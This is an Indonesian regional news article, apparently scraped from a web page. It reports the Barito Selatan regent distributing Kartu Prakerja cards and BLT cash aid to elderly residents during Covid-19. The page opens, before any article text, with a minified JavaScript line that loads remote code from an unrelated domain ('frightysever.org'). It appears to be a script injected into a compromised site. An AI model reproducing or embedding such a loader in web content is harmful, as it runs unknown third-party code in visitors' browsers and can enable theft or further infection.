(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Bupati Barsel Serahkan Kartu Prakerja dan BLT untuk Lansia


KANALKALIMANTAN.COM, BUNTOK – Berbagai upaya dilakukan Pemerintah Kabupaten (Pemkab) Barito Selatan untuk menghadapi kesulitan masyarakat dalam penanganan dampak sosial Covid-19 saat ini. Salah satunya memberikan kartu prakerja dan Bantuan Langsung Tunai (BLT) serta bantuan sembako kepada masyarakat yang sudah menjadi sasaran sebagai calon penerima.

Bupati Barsel, H Eddy Raya Samsuri mengatakan, pemerintah daerah telah membentuk sekretariat bersama (sekber) yang terdiri dari empat instansi. Adapun tugas sekber sambungnya ialah menangani tenaga kerja pada sektor formal dan informal serta masyarakat miskin untuk mendapatkan kartu prakerja, BLT dan sembako.

“Hari ini kita menyerahkan kartu prakerja dan BLT kepada sejumlah lansia yang sudah terdata dan jadi sasaran penerima,” kata Eddy Raya, kepada Kanalkalimantan.com, di aula Setda Barsel Senin (4/5).

Sementara untuk data yang jadi sasaran penerima BLT, kartu prakerja dan bantuan sembako yang dikelola oleh Sekber sambungnya, antara lain buruh yang tidak terdaftar sebagai penerima bantuan sosial dan PKH.

“Selainitu pelaku UKM yang terdampak covid-19, karyawan formal yang dirumahkan, dan masyarakat yang membutuhkan kompetensi kerja melalui kartu prakerja akan menerima bantuan juga,” ucap Eddy Raya.

Masih kata orang nomor satu di Barsel itu untuk jumlah masyarakat yang mendaftar untuk mendapatkan kartu prakerja pada sekber hingga tanggal 30 April 2020 pada gelombang I sampai III sekitar 1.158 orang. Di mana yang sudah terverifikasi kartu prakerja sekitar 687 orang.

“Ini menunjukan kalau masyarakat begitu antusias untuk mengikuti program pemerintah melalui kartu prakerja tersebut,” ujar Eddy Raya.

Ditambahkan olehnya kiranya proses penyaluran bantuan ini bisa berjalan dengan baik dan lancar, karena nanti akan disusul lagi dengan penyerahan bansos kembali sebanyak 7800 KK atau kurang lebih 25800 orang yang mana akan dibagi diseluruh wilayah Kabupaten Barsel.

“Semoga proses penyaluran bantuan untuk covid-19 ini bisa berjalan lancar dan sesuai prosedur, sesuai dengan arahan juga harapan dari Presiden dan Gubernur Kalteng,” pungkas Eddy Raya.
Di tempat yang sama Plt Kepala DSPMDes Barsel H Haitami terkait BLT untuk lansia mengatakan, terkait bantuan untuk lansia hari ini merupakan khusus untuk warga Kematan Dusun Selatan sebanyak 35 orang, yang mana bantuan tiap orangnya sebanyak Rp 2.700.000 atau total keseluruhan Rp 94.500.000 dan hari ini disalurkan semua kepada penerima.

“Jadi untuk lansia yang mendapatkan BLT hari ini semua dari Kecamatan Dusel, yang mana untuk bantuan ini dibantu sekali setahun dalam bentuk uang yang mana per orang menerima sebanyak Rp 2.700.000,” ungkap Haitami sekaligus mengakhiri.(kanalkalimantan.com/digdo)

 

Reporter : Digdo
Editor : Cell

 


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

1 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

2 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

2 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

2 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

2 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

2 jam ago

This website uses cookies.